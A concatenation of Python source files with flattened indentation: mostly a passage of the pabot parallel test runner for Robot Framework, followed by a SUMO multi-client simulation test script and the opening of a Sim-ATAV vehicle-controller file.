def _open_pabotsuitenames(mode):
return open(".pabotsuitenames", mode)
else:
def _open_pabotsuitenames(mode):
return open(".pabotsuitenames", mode, encoding="utf-8")
def solve_suite_names(outs_dir, datasources, options, pabot_args):
h = Hashes(
dirs=get_hash_of_dirs(datasources),
cmd=get_hash_of_command(options, pabot_args),
suitesfrom=_suitesfrom_hash(pabot_args),
)
try:
if not os.path.isfile(".pabotsuitenames"):
suite_names = generate_suite_names(
outs_dir, datasources, options, pabot_args
)
store_suite_names(h, suite_names)
return suite_names
with _open_pabotsuitenames("r") as suitenamesfile:
lines = [line.strip() for line in suitenamesfile.readlines()]
corrupted = len(lines) < 5
file_h = None # type: Optional[Hashes]
file_hash = None # type: Optional[str]
hash_of_file = None # type: Optional[str]
if not corrupted:
file_h = Hashes(
dirs=lines[0][len("datasources:") :],
cmd=lines[1][len("commandlineoptions:") :],
suitesfrom=lines[2][len("suitesfrom:") :],
)
file_hash = lines[3][len("file:") :]
hash_of_file = _file_hash(lines)
corrupted = corrupted or any(
not l.startswith("--suite ")
and not l.startswith("--test ")
and l != "#WAIT"
and l != "{"
and l != "}"
for l in lines[4:]
)
execution_item_lines = [parse_execution_item_line(l) for l in lines[4:]]
if corrupted or h != file_h or file_hash != hash_of_file:
return _regenerate(
file_h,
h,
pabot_args,
outs_dir,
datasources,
options,
execution_item_lines,
)
return execution_item_lines
except IOError:
return _levelsplit(
generate_suite_names_with_builder(outs_dir, datasources, options),
pabot_args,
)
def _levelsplit(
suites, pabot_args
): # type: (List[SuiteItem], Dict[str, str]) -> List[ExecutionItem]
if pabot_args.get("testlevelsplit"):
tests = [] # type: List[ExecutionItem]
for s in suites:
tests.extend(s.tests)
return tests
return list(suites)
def _group_by_wait(lines):
suites = [[]] # type: List[List[ExecutionItem]]
for suite in lines:
if not suite.isWait:
if suite:
suites[-1].append(suite)
else:
suites.append([])
return suites
def _regenerate(
file_h, h, pabot_args, outs_dir, datasources, options, lines
): # type: (Optional[Hashes], Hashes, Dict[str, str], str, List[str], Dict[str, str], List[ExecutionItem]) -> List[ExecutionItem]
assert all(isinstance(s, ExecutionItem) for s in lines)
if (
(file_h is None or file_h.suitesfrom != h.suitesfrom)
and "suitesfrom" in pabot_args
and os.path.isfile(pabot_args["suitesfrom"])
):
suites = _suites_from_outputxml(pabot_args["suitesfrom"])
if file_h is None or file_h.dirs != h.dirs:
all_suites = generate_suite_names_with_builder(
outs_dir, datasources, options
)
else:
all_suites = [suite for suite in lines if suite]
suites = _preserve_order(all_suites, suites)
else:
suites = _levelsplit(
generate_suite_names_with_builder(outs_dir, datasources, options),
pabot_args,
)
suites = _preserve_order(suites, [suite for suite in lines if suite])
if suites:
store_suite_names(h, suites)
assert all(isinstance(s, ExecutionItem) for s in suites)
return suites
def _contains_suite_and_test(suites):
return any(isinstance(s, SuiteItem) for s in suites) and any(
isinstance(t, TestItem) for t in suites
)
def _preserve_order(new_items, old_items):
assert all(isinstance(s, ExecutionItem) for s in new_items)
assert all(isinstance(s, ExecutionItem) for s in old_items)
old_contains_tests = any(isinstance(t, TestItem) for t in old_items)
old_contains_suites = any(isinstance(s, SuiteItem) for s in old_items)
old_items = _fix_items(old_items)
new_contains_tests = any(isinstance(t, TestItem) for t in new_items)
if old_contains_tests and old_contains_suites and not new_contains_tests:
new_items = _split_partially_to_tests(new_items, old_items)
# TODO: Preserving order when suites => tests OR tests => suites
preserve, ignorable = _get_preserve_and_ignore(
new_items, old_items, old_contains_tests and old_contains_suites
)
exists_in_old_and_new = [
s for s in old_items if (s in new_items and s not in ignorable) or s in preserve
]
exists_only_in_new = [
s for s in new_items if s not in old_items and s not in ignorable
]
return _fix_items(exists_in_old_and_new + exists_only_in_new)
def _fix_items(items): # type: (List[ExecutionItem]) -> List[ExecutionItem]
assert all(isinstance(s, ExecutionItem) for s in items)
to_be_removed = [] # type: List[int]
for i in range(len(items)):
for j in range(i + 1, len(items)):
if items[i].contains(items[j]):
to_be_removed.append(j)
items = [item for i, item in enumerate(items) if i not in to_be_removed]
result = [] # type: List[ExecutionItem]
to_be_splitted = {} # type: Dict[int, List[ExecutionItem]]
for i in range(len(items)):
if i in to_be_splitted:
result.extend(items[i].difference(to_be_splitted[i]))
else:
result.append(items[i])
for j in range(i + 1, len(items)):
if items[j].contains(items[i]):
if j not in to_be_splitted:
to_be_splitted[j] = []
to_be_splitted[j].append(items[i])
_remove_double_waits(result)
_remove_empty_groups(result)
if result and result[0].isWait:
result = result[1:]
if result and result[-1].isWait:
result = result[:-1]
return result
def _get_preserve_and_ignore(new_items, old_items, old_contains_suites_and_tests):
ignorable = []
preserve = []
for old_item in old_items:
for new_item in new_items:
if (
old_item.contains(new_item)
and new_item != old_item
and (isinstance(new_item, SuiteItem) or old_contains_suites_and_tests)
):
preserve.append(old_item)
ignorable.append(new_item)
if (
old_item.isWait
or isinstance(old_item, GroupStartItem)
or isinstance(old_item, GroupEndItem)
):
preserve.append(old_item)
preserve = [
new_item
for new_item in preserve
if not any([i.contains(new_item) and i != new_item for i in preserve])
]
return preserve, ignorable
def _remove_double_waits(exists_in_old_and_new): # type: (List[ExecutionItem]) -> None
doubles = []
for i, (j, k) in enumerate(zip(exists_in_old_and_new, exists_in_old_and_new[1:])):
if j.isWait and k == j:
doubles.append(i)
for i in reversed(doubles):
del exists_in_old_and_new[i]
def _remove_empty_groups(exists_in_old_and_new): # type: (List[ExecutionItem]) -> None
removables = []
for i, (j, k) in enumerate(zip(exists_in_old_and_new, exists_in_old_and_new[1:])):
if isinstance(j, GroupStartItem) and isinstance(k, GroupEndItem):
removables.extend([i, i + 1])
for i in reversed(removables):
del exists_in_old_and_new[i]
def _split_partially_to_tests(
new_suites, old_suites
): # type: (List[SuiteItem], List[ExecutionItem]) -> List[ExecutionItem]
suits = [] # type: List[ExecutionItem]
for s in new_suites:
split = False
for old_test in old_suites:
if isinstance(old_test, TestItem) and s.contains(old_test):
split = True
if split:
suits.extend(s.tests)
else:
suits.append(s)
return suits
def _file_hash(lines):
digest = hashlib.sha1()
digest.update(lines[0].encode())
digest.update(lines[1].encode())
digest.update(lines[2].encode())
hashes = 0
for line in lines[4:]:
if line not in ("#WAIT", "{", "}"):
line = line.decode("utf-8") if PY2 else line
hashes ^= int(hashlib.sha1(line.encode("utf-8")).hexdigest(), 16)
digest.update(str(hashes).encode())
return digest.hexdigest()
def store_suite_names(hashes, suite_names):
# type: (Hashes, List[ExecutionItem]) -> None
assert all(isinstance(s, ExecutionItem) for s in suite_names)
suite_lines = [s.line() for s in suite_names]
_write("Storing .pabotsuitenames file")
try:
with _open_pabotsuitenames("w") as suitenamesfile:
suitenamesfile.write("datasources:" + hashes.dirs + "\n")
suitenamesfile.write("commandlineoptions:" + hashes.cmd + "\n")
suitenamesfile.write("suitesfrom:" + hashes.suitesfrom + "\n")
suitenamesfile.write(
"file:"
+ _file_hash(
[
"datasources:" + hashes.dirs,
"commandlineoptions:" + hashes.cmd,
"suitesfrom:" + hashes.suitesfrom,
None,
]
+ suite_lines
)
+ "\n"
)
suitenamesfile.writelines(
(d + "\n").encode("utf-8") if PY2 and is_unicode(d) else d + "\n"
for d in suite_lines
)
except IOError:
_write(
"[ "
+ _wrap_with(Color.YELLOW, "WARNING")
+ " ]: storing .pabotsuitenames failed"
)
def generate_suite_names(
outs_dir, datasources, options, pabot_args
): # type: (object, object, object, Dict[str, str]) -> List[ExecutionItem]
suites = [] # type: List[SuiteItem]
if "suitesfrom" in pabot_args and os.path.isfile(pabot_args["suitesfrom"]):
suites = _suites_from_outputxml(pabot_args["suitesfrom"])
else:
suites = generate_suite_names_with_builder(outs_dir, datasources, options)
if pabot_args.get("testlevelsplit"):
tests = [] # type: List[ExecutionItem]
for s in suites:
tests.extend(s.tests)
return tests
return list(suites)
def generate_suite_names_with_builder(outs_dir, datasources, options):
opts = _options_for_dryrun(options, outs_dir)
settings = RobotSettings(opts)
builder = TestSuiteBuilder(
settings["SuiteNames"], settings.extension, rpa=settings.rpa
)
suite = builder.build(*datasources)
settings.rpa = builder.rpa
suite.configure(**settings.suite_config)
if settings.pre_run_modifiers:
_write.error = _write
suite.visit(
ModelModifier(settings.pre_run_modifiers, settings.run_empty_suite, _write)
)
all_suites = (
get_all_suites_from_main_suite(suite.suites) if suite.suites else [suite]
)
suite_names = [
SuiteItem(
suite.longname,
tests=[test.longname for test in suite.tests],
suites=suite.suites,
)
for suite in all_suites
]
if not suite_names and not options.get("runemptysuite", False):
stdout_value = opts["stdout"].getvalue()
if stdout_value:
_write(
"[STDOUT] from suite search:\n" + stdout_value + "[STDOUT] end",
Color.YELLOW,
)
stderr_value = opts["stderr"].getvalue()
if stderr_value:
_write(
"[STDERR] from suite search:\n" + stderr_value + "[STDERR] end",
Color.RED,
)
return list(sorted(set(suite_names)))
def get_all_suites_from_main_suite(suites):
all_suites = []
for suite in suites:
if suite.suites:
all_suites.extend(get_all_suites_from_main_suite(suite.suites))
else:
all_suites.append(suite)
return all_suites
class SuiteNotPassingsAndTimes(ResultVisitor):
def __init__(self):
self.suites = [] # type: List[Tuple[bool, int, str]]
def start_suite(self, suite):
if len(suite.tests) > 0:
self.suites.append((not suite.passed, suite.elapsedtime, suite.longname))
def _suites_from_outputxml(outputxml):
res = ExecutionResult(outputxml)
suite_times = SuiteNotPassingsAndTimes()
res.visit(suite_times)
return [SuiteItem(suite) for (_, _, suite) in reversed(sorted(suite_times.suites))]
def _options_for_dryrun(options, outs_dir):
options = options.copy()
options["log"] = "NONE"
options["report"] = "NONE"
options["xunit"] = "NONE"
options["variable"] = options.get("variable", [])[:]
options["variable"].append(pabotlib.PABOT_QUEUE_INDEX + ":-1")
if ROBOT_VERSION >= "2.8":
options["dryrun"] = True
else:
options["runmode"] = "DryRun"
options["output"] = "suite_names.xml"
# --timestampoutputs is not compatible with hard-coded suite_names.xml
options["timestampoutputs"] = False
options["outputdir"] = outs_dir
if PY2:
options["stdout"] = BytesIO()
options["stderr"] = BytesIO()
else:
options["stdout"] = StringIO()
options["stderr"] = StringIO()
options["listener"] = []
return _set_terminal_coloring_options(options)
def _options_for_rebot(options, start_time_string, end_time_string):
rebot_options = options.copy()
rebot_options["starttime"] = start_time_string
rebot_options["endtime"] = end_time_string
rebot_options["monitorcolors"] = "off"
rebot_options["suite"] = []
rebot_options["test"] = []
rebot_options["exclude"] = []
rebot_options["include"] = []
if ROBOT_VERSION >= "2.8":
options["monitormarkers"] = "off"
return rebot_options
def _now():
return datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")
def _print_elapsed(start, end):
_write(
"Total testing: "
+ _time_string(sum(_ALL_ELAPSED))
+ "\nElapsed time: "
+ _time_string(end - start)
)
def _time_string(elapsed):
millis = int((elapsed * 100) % 100)
seconds = int(elapsed) % 60
elapsed_minutes = (int(elapsed) - seconds) / 60
minutes = elapsed_minutes % 60
elapsed_hours = (elapsed_minutes - minutes) / 60
elapsed_string = ""
if elapsed_hours > 0:
plural = ""
if elapsed_hours > 1:
plural = "s"
elapsed_string += ("%d hour" % elapsed_hours) + plural + " "
if minutes > 0:
plural = ""
if minutes > 1:
plural = "s"
elapsed_string += ("%d minute" % minutes) + plural + " "
return elapsed_string + "%d.%d seconds" % (seconds, millis)
def keyboard_interrupt(*args):
global CTRL_C_PRESSED
CTRL_C_PRESSED = True
def _parallel_execute(items, processes):
original_signal_handler = signal.signal(signal.SIGINT, keyboard_interrupt)
pool = ThreadPool(processes)
result = pool.map_async(execute_and_wait_with, items, 1)
pool.close()
while not result.ready():
# keyboard interrupt is executed in main thread
# and needs this loop to get time to get executed
try:
time.sleep(0.1)
except IOError:
keyboard_interrupt()
signal.signal(signal.SIGINT, original_signal_handler)
def _output_dir(options, cleanup=True):
outputdir = options.get("outputdir", ".")
outpath = os.path.join(outputdir, "pabot_results")
if cleanup and os.path.isdir(outpath):
shutil.rmtree(outpath)
return outpath
def _copy_output_artifacts(options, file_extensions=None, include_subfolders=False):
file_extensions = file_extensions or ["png"]
pabot_outputdir = _output_dir(options, cleanup=False)
outputdir = options.get("outputdir", ".")
copied_artifacts = []
for location, _, file_names in os.walk(pabot_outputdir):
for file_name in file_names:
file_ext = file_name.split(".")[-1]
if file_ext in file_extensions:
rel_path = os.path.relpath(location, pabot_outputdir)
prefix = rel_path.split(os.sep)[0] # folders named "process-id"
dst_folder_path = outputdir
# if it is a file from sub-folders of "location"
if os.sep in rel_path:
if not include_subfolders:
continue
# create destination sub-folder
subfolder_path = rel_path[rel_path.index(os.sep) + 1 :]
dst_folder_path = os.path.join(outputdir, subfolder_path)
if not os.path.isdir(dst_folder_path):
os.makedirs(dst_folder_path)
dst_file_name = "-".join([prefix, file_name])
shutil.copyfile(
os.path.join(location, file_name),
os.path.join(dst_folder_path, dst_file_name),
)
copied_artifacts.append(file_name)
return copied_artifacts
def _report_results(outs_dir, pabot_args, options, start_time_string, tests_root_name):
if ROBOT_VERSION < "4.0":
stats = {
"critical": {"total": 0, "passed": 0, "failed": 0},
"all": {"total": 0, "passed": 0, "failed": 0},
}
else:
stats = {
"total": 0,
"passed": 0,
"failed": 0,
"skipped": 0,
}
if pabot_args["argumentfiles"]:
outputs = [] # type: List[str]
for index, _ in pabot_args["argumentfiles"]:
copied_artifacts = _copy_output_artifacts(
options, pabot_args["artifacts"], pabot_args["artifactsinsubfolders"]
)
outputs += [
_merge_one_run(
os.path.join(outs_dir, index),
options,
tests_root_name,
stats,
copied_artifacts,
outputfile=os.path.join("pabot_results", "output%s.xml" % index),
)
]
if "output" not in options:
options["output"] = "output.xml"
_write_stats(stats)
return rebot(*outputs, **_options_for_rebot(options, start_time_string, _now()))
else:
return _report_results_for_one_run(
outs_dir, pabot_args, options, start_time_string, tests_root_name, stats
)
def _write_stats(stats):
if ROBOT_VERSION < "4.0":
crit = stats["critical"]
al = stats["all"]
_write(
"%d critical tests, %d passed, %d failed"
% (crit["total"], crit["passed"], crit["failed"])
)
_write(
"%d tests total, %d passed, %d failed"
% (al["total"], al["passed"], al["failed"])
)
else:
_write(
"%d tests, %d passed, %d failed, %d skipped."
% (stats["total"], stats["passed"], stats["failed"], stats["skipped"])
)
_write("===================================================")
def _report_results_for_one_run(
outs_dir, pabot_args, options, start_time_string, tests_root_name, stats
):
copied_artifacts = _copy_output_artifacts(
options, pabot_args["artifacts"], pabot_args["artifactsinsubfolders"]
)
output_path = _merge_one_run(
outs_dir, options, tests_root_name, stats, copied_artifacts
)
_write_stats(stats)
if (
"report" in options
and options["report"] == "NONE"
and "log" in options
and options["log"] == "NONE"
):
options[
"output"
] = output_path # REBOT will return error 252 if nothing is written
else:
_write("Output: %s" % output_path)
options["output"] = None # Do not write output again with rebot
return rebot(output_path, **_options_for_rebot(options, start_time_string, _now()))
def _merge_one_run(
outs_dir, options, tests_root_name, stats, copied_artifacts, outputfile=None
):
outputfile = outputfile or options.get("output", "output.xml")
output_path = os.path.abspath(
os.path.join(options.get("outputdir", "."), outputfile)
)
files = sorted(glob(os.path.join(_glob_escape(outs_dir), "**/*.xml")))
if not files:
_write('WARN: No output files in "%s"' % outs_dir, Color.YELLOW)
return ""
def invalid_xml_callback():
global _ABNORMAL_EXIT_HAPPENED
_ABNORMAL_EXIT_HAPPENED = True
if PY2:
files = [f.decode(SYSTEM_ENCODING) if not is_unicode(f) else f for f in files]
resu = merge(
files, options, tests_root_name, copied_artifacts, invalid_xml_callback
)
_update_stats(resu, stats)
resu.save(output_path)
return output_path
def _update_stats(result, stats):
s = result.statistics
if ROBOT_VERSION < "4.0":
stats["critical"]["total"] += s.total.critical.total
stats["critical"]["passed"] += s.total.critical.passed
stats["critical"]["failed"] += s.total.critical.failed
stats["all"]["total"] += s.total.all.total
stats["all"]["passed"] += s.total.all.passed
stats["all"]["failed"] += s.total.all.failed
else:
stats["total"] += s.total.total
stats["passed"] += s.total.passed
stats["failed"] += s.total.failed
stats["skipped"] += s.total.skipped
# This is from https://github.com/django/django/blob/master/django/utils/glob.py
_magic_check = re.compile("([*?[])")
def _glob_escape(pathname):
"""
Escape all special characters.
"""
drive, pathname = os.path.splitdrive(pathname)
pathname = _magic_check.sub(r"[\1]", pathname)
return drive + pathname
def _writer():
while True:
message = MESSAGE_QUEUE.get()
if message is None:
MESSAGE_QUEUE.task_done()
return
print(message)
sys.stdout.flush()
MESSAGE_QUEUE.task_done()
def _write(message, color=None):
MESSAGE_QUEUE.put(_wrap_with(color, message))
def _wrap_with(color, message):
if _is_output_coloring_supported() and color:
return "%s%s%s" % (color, message, Color.ENDC)
return message
def _is_output_coloring_supported():
return sys.stdout.isatty() and os.name in Color.SUPPORTED_OSES
def _start_message_writer():
t = threading.Thread(target=_writer)
t.start()
def _stop_message_writer():
MESSAGE_QUEUE.put(None)
MESSAGE_QUEUE.join()
def _get_free_port(pabot_args):
if pabot_args["pabotlibport"] != 0:
return pabot_args["pabotlibport"]
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(("localhost", 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
def _start_remote_library(pabot_args): # type: (dict) -> Optional[subprocess.Popen]
global _PABOTLIBURI
free_port = _get_free_port(pabot_args)
_PABOTLIBURI = "%s:%s" % (pabot_args["pabotlibhost"], free_port)
if not pabot_args["pabotlib"]:
return None
if pabot_args.get("resourcefile") and not os.path.exists(
pabot_args["resourcefile"]
):
_write(
"Warning: specified resource file doesn't exist."
" Some tests may fail or continue forever.",
Color.YELLOW,
)
pabot_args["resourcefile"] = None
return subprocess.Popen(
'"{python}" -m {pabotlibname} {resourcefile} {pabotlibhost} {pabotlibport}'.format(
python=sys.executable,
pabotlibname=pabotlib.__name__,
resourcefile=pabot_args.get("resourcefile"),
pabotlibhost=pabot_args["pabotlibhost"],
pabotlibport=free_port,
),
shell=True,
)
def _stop_remote_library(process): # type: (subprocess.Popen) -> None
_write("Stopping PabotLib process")
try:
remoteLib = Remote(_PABOTLIBURI)
remoteLib.run_keyword("stop_remote_libraries", [], {})
remoteLib.run_keyword("stop_remote_server", [], {})
except RuntimeError:
_write("Could not connect to PabotLib - assuming stopped already")
return
i = 50
while i > 0 and process.poll() is None:
time.sleep(0.1)
i -= 1
if i == 0:
_write(
"Could not stop PabotLib Process in 5 seconds " "- calling terminate",
Color.YELLOW,
)
process.terminate()
else:
_write("PabotLib process stopped")
def _get_suite_root_name(suite_names):
top_names = [x.top_name() for group in suite_names for x in group]
if top_names and top_names.count(top_names[0]) == len(top_names):
return top_names[0]
return ""
class QueueItem(object):
_queue_index = 0
def __init__(
self,
datasources,
outs_dir,
options,
execution_item,
command,
verbose,
argfile,
hive=None,
processes=0,
):
# type: (List[str], str, Dict[str, object], ExecutionItem, List[str], bool, Tuple[str, Optional[str]], Optional[str], int) -> None
self.datasources = datasources
self.outs_dir = (
outs_dir.encode("utf-8") if PY2 and is_unicode(outs_dir) else outs_dir
)
self.options = options
self.execution_item = (
execution_item if not hive else HivedItem(execution_item, hive)
)
self.command = command
self.verbose = verbose
self.argfile_index = argfile[0]
self.argfile = argfile[1]
self._index = QueueItem._queue_index
QueueItem._queue_index += 1
self.last_level = None
self.hive = hive
self.processes = processes
@property
def index(self):
# type: () -> int
return self._index
@property
def display_name(self):
# type: () -> str
if self.argfile:
return "%s {%s}" % (self.execution_item.name, self.argfile)
return self.execution_item.name
def _create_execution_items(
suite_names, datasources, outs_dir, options, opts_for_run, pabot_args
):
is_dry_run = (
options.get("dryrun")
if ROBOT_VERSION >= "2.8"
else options.get("runmode") == "DryRun"
)
if is_dry_run:
all_items = _create_execution_items_for_dry_run(
suite_names, datasources, outs_dir, opts_for_run, pabot_args
)
else:
all_items = _create_execution_items_for_run(
suite_names, datasources, outs_dir, options, opts_for_run, pabot_args
)
_construct_index_and_completed_index(all_items)
_construct_last_levels(all_items)
return all_items
def _construct_index_and_completed_index(all_items):
# type: (List[List[QueueItem]]) -> None
global _COMPLETED_LOCK, _NOT_COMPLETED_INDEXES
with _COMPLETED_LOCK:
for item_group in all_items:
for item in item_group:
_NOT_COMPLETED_INDEXES.append(item.index)
def _create_execution_items_for_run(
suite_names, datasources, outs_dir, options, opts_for_run, pabot_args
):
global _NUMBER_OF_ITEMS_TO_BE_EXECUTED
all_items = [] # type: List[List[QueueItem]]
_NUMBER_OF_ITEMS_TO_BE_EXECUTED = 0
for suite_group in suite_names:
# TODO: Fix this better
if (
options.get("randomize") in ["all", "suites"]
and "suitesfrom" not in pabot_args
):
random.shuffle(suite_group)
items = _create_items(
datasources, opts_for_run, outs_dir, pabot_args, suite_group
)
_NUMBER_OF_ITEMS_TO_BE_EXECUTED += len(items)
all_items.append(items)
return all_items
def _create_items(datasources, opts_for_run, outs_dir, pabot_args, suite_group):
return [
QueueItem(
datasources,
outs_dir,
opts_for_run,
suite,
pabot_args["command"],
pabot_args["verbose"],
argfile,
pabot_args.get("hive"),
pabot_args["processes"],
)
for suite in suite_group
for argfile in pabot_args["argumentfiles"] or [("", None)]
]
def _create_execution_items_for_dry_run(
suite_names, datasources, outs_dir, opts_for_run, pabot_args
):
global _NUMBER_OF_ITEMS_TO_BE_EXECUTED
all_items = [] # type: List[List[QueueItem]]
_NUMBER_OF_ITEMS_TO_BE_EXECUTED = 0
processes_count = pabot_args["processes"]
for suite_group in suite_names:
items = _create_items(
datasources, opts_for_run, outs_dir, pabot_args, suite_group
)
chunk_size = (
round(len(items) / processes_count)
if len(items) > processes_count
else len(items)
)
chunked_items = list(_chunk_items(items, chunk_size))
_NUMBER_OF_ITEMS_TO_BE_EXECUTED += len(chunked_items)
all_items.append(chunked_items)
return all_items
def _chunk_items(items, chunk_size):
for i in range(0, len(items), chunk_size):
chunked_items = items[i : i + chunk_size]
base_item = chunked_items[0]
if not base_item:
continue
execution_items = SuiteItems([item.execution_item for item in chunked_items])
chunked_item = QueueItem(
base_item.datasources,
base_item.outs_dir,
base_item.options,
execution_items,
base_item.command,
base_item.verbose,
(base_item.argfile_index, base_item.argfile),
processes=base_item.processes,
)
yield chunked_item
def _find_ending_level(name, group):
n = name.split(".")
level = -1
for other in group:
o = other.split(".")
dif = [i for i in range(min(len(o), len(n))) if o[i] != n[i]]
if dif:
level = max(dif[0], level)
else:
return name + ".PABOT_noend"
return ".".join(n[: (level + 1)])
def _construct_last_levels(all_items):
names = []
for items in all_items:
for item in items:
if isinstance(item.execution_item, SuiteItems):
for suite in item.execution_item.suites:
names.append(suite.name)
else:
names.append(item.execution_item.name)
for items in all_items:
for item in items:
if isinstance(item.execution_item, SuiteItems):
for suite in item.execution_item.suites:
item.last_level = _find_ending_level(
suite.name, names[item.index + 1 :]
)
else:
item.last_level = _find_ending_level(
item.execution_item.name, names[item.index + 1 :]
)
def _initialize_queue_index():
global _PABOTLIBURI
plib = Remote(_PABOTLIBURI)
# INITIALISE PARALLEL QUEUE MIN INDEX
for i in range(300):
try:
plib.run_keyword(
"set_parallel_value_for_key",
[pabotlib.PABOT_MIN_QUEUE_INDEX_EXECUTING_PARALLEL_VALUE, 0],
{},
)
return
except RuntimeError as e:
# REMOTE LIB NOT YET CONNECTED
time.sleep(0.1)
raise RuntimeError("Can not connect to PabotLib at %s" % _PABOTLIBURI)
def _add_dynamically_created_execution_items(
execution_items, datasources, outs_dir, opts_for_run, pabot_args
):
global _COMPLETED_LOCK, _NOT_COMPLETED_INDEXES, _NUMBER_OF_ITEMS_TO_BE_EXECUTED
if not _pabotlib_in_use():
return
plib = Remote(_PABOTLIBURI)
new_suites = plib.run_keyword("get_added_suites", [], {})
if len(new_suites) == 0:
return
suite_group = [DynamicSuiteItem(s, v) for s, v in new_suites]
items = [
QueueItem(
datasources,
outs_dir,
opts_for_run,
suite,
pabot_args["command"],
pabot_args["verbose"],
("", None),
pabot_args.get("hive"),
pabot_args["processes"],
)
for suite in suite_group
]
with _COMPLETED_LOCK:
_NUMBER_OF_ITEMS_TO_BE_EXECUTED += len(items)
for item in items:
_NOT_COMPLETED_INDEXES.append(item.index)
execution_items.insert(0, items)
def main(args=None):
global _PABOTLIBPROCESS
args = args or sys.argv[1:]
if len(args) == 0:
print(
"[ "
+ _wrap_with(Color.RED, "ERROR")
+ " ]: Expected at least 1 argument, got 0."
)
print("Try --help for usage information.")
sys.exit(252)
start_time = time.time()
start_time_string = _now()
# NOTE: timeout option
try:
_start_message_writer()
options, datasources, pabot_args, opts_for_run = parse_args(args)
if pabot_args["help"]:
print(__doc__)
sys.exit(0)
if len(datasources) == 0:
print("[ " + _wrap_with(Color.RED, "ERROR") + " ]: No datasources given.")
print("Try --help for usage information.")
sys.exit(252)
_PABOTLIBPROCESS = _start_remote_library(pabot_args)
if _pabotlib_in_use():
_initialize_queue_index()
outs_dir = _output_dir(options)
suite_names = solve_suite_names(outs_dir, datasources, options, pabot_args)
if pabot_args["verbose"]:
_write("Suite names resolved in %s seconds" % str(time.time() - start_time))
ordering = pabot_args.get("ordering")
if ordering:
suite_names = _preserve_order(suite_names, ordering)
suite_names = _group_by_wait(_group_by_groups(suite_names))
if not suite_names or suite_names == [[]]:
_write("No tests to execute")
if not options.get("runemptysuite", False):
sys.exit(252)
execution_items = _create_execution_items(
suite_names, datasources, outs_dir, options, opts_for_run, pabot_args
)
while execution_items:
items = execution_items.pop(0)
_parallel_execute(items, pabot_args["processes"])
_add_dynamically_created_execution_items(
execution_items, datasources, outs_dir, opts_for_run, pabot_args
)
result_code = _report_results(
outs_dir,
pabot_args,
options,
start_time_string,
_get_suite_root_name(suite_names),
)
sys.exit(result_code if not _ABNORMAL_EXIT_HAPPENED else 252)
except Information as i:
print(__doc__)
print(i.message)
except DataError as err:
print(err.message)
sys.exit(252)
except Exception:
_write("[ERROR] EXCEPTION RAISED DURING PABOT EXECUTION", Color.RED)
_write(
"[ERROR] PLEASE CONSIDER REPORTING THIS ISSUE TO https://github.com/mkorpela/pabot/issues",
Color.RED,
)
raise
finally:
if _PABOTLIBPROCESS:
_stop_remote_library(_PABOTLIBPROCESS)
_print_elapsed(start_time, time.time())
_stop_message_writer()
if __name__ == "__main__":
main()
|
sumo_multi_clients.py
|
import os
import subprocess
import threading
import time
from smarts.core.utils.sumo import SUMO_PATH, sumolib, traci
PORT = 8001
"""
Conclusions:
1. connected clients < num-clients: SUMO will block, only start once all clients have connected.
2. connected clients > num-clients: Extra connection will be closed by SUMO.
3. The simulation does not advance to the next step until all clients have called the 'simulationStep' command.
4. For multi client scenarios currently only TargetTime 0 is supported, which means 'simulationStep' performs exactly one time step.
"""
def start_sumo_server():
sumo_binary = "sumo"
sumo_cmd = [
os.path.join(SUMO_PATH, "bin", sumo_binary),
"--net-file=scenarios/loop/map.net.xml",
"--num-clients=3",
"--remote-port=%s" % PORT,
]
sumo_proc = subprocess.Popen(
sumo_cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
time.sleep(0.1)
traci_conn = traci.connect(
PORT, numRetries=100, proc=sumo_proc, waitBetweenRetries=0.01
)
return traci_conn
def connect(port, order=None):
traci_conn = traci.connect(port, numRetries=100, proc=None, waitBetweenRetries=0.1)
if order is not None:
traci_conn.setOrder(order)
return traci_conn
def test_client_connection(client, client_name):
for i in range(10):
print(f"{client_name} steping simulation")
client.simulationStep()
client.close()
def init_client():
client = start_sumo_server()
client.setOrder(1)
test_client_connection(client, "client 1")
def run_client_2():
client2 = connect(PORT, 2)
test_client_connection(client2, "client 2")
def run_client_3():
client3 = connect(PORT, 3)
test_client_connection(client3, "client 3")
def main():
t1 = threading.Thread(target=init_client, args=())
t1.start()
t2 = threading.Thread(target=run_client_2, args=())
t2.start()
t3 = threading.Thread(target=run_client_3, args=())
t3.start()
t1.join()
t2.join()
t3.join()
if __name__ == "__main__":
main()
|
automated_driving_with_fusion2_1.py
|
"""Defines SimpleSensorFusionControl class
----------------------------------------------------------------------------------------------------------
This file is part of Sim-ATAV project and licensed under MIT license.
Copyright (c) 2018 Cumhur Erkan Tuncali, Georgios Fainekos, Danil Prokhorov, Hisahiro Ito, James Kapinski.
For questions please contact:
C. Erkan Tuncali (etuncali [at] asu.edu)
----------------------------------------------------------------------------------------------------------
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import sys
import math
import numpy as np
import threading
import pickle
from Sim_ATAV.common.controller_communication_interface import ControllerCommunicationInterface
from Sim_ATAV.vehicle_control.base_controller.base_controller import BaseCarController
from Sim_ATAV.vehicle_control.controller_commons import controller_commons
from Sim_ATAV.vehicle_control.controller_commons.path_following_tools import PathFollowingTools
from Sim_ATAV.vehicle_control.controller_commons.perception.sensor_fusion.sensor_fusion_tracker \
import SensorFusionTracker
from Sim_ATAV.vehicle_control.controller_commons.planning.target_speed_planner import TargetSpeedPlanner,\
TargetSpeedData
from Sim_ATAV.vehicle_control.generic_stanley_controller.generic_stanley_controller \
import GenericStanleyController
from Sim_ATAV.vehicle_control.generic_pid_controller.generic_pid_controller import GenericPIDController
from Sim_ATAV.vehicle_control.controller_commons.visualization.camera_info_display import CameraInfoDisplay
WORLD_TIME_STEP_MS = 10
HAS_DEBUG_DISPLAY = True
SENSOR_TYPE = 'Actual' # 'Actual', 'Perfect'
DEBUG_MODE = False
# Our global variables
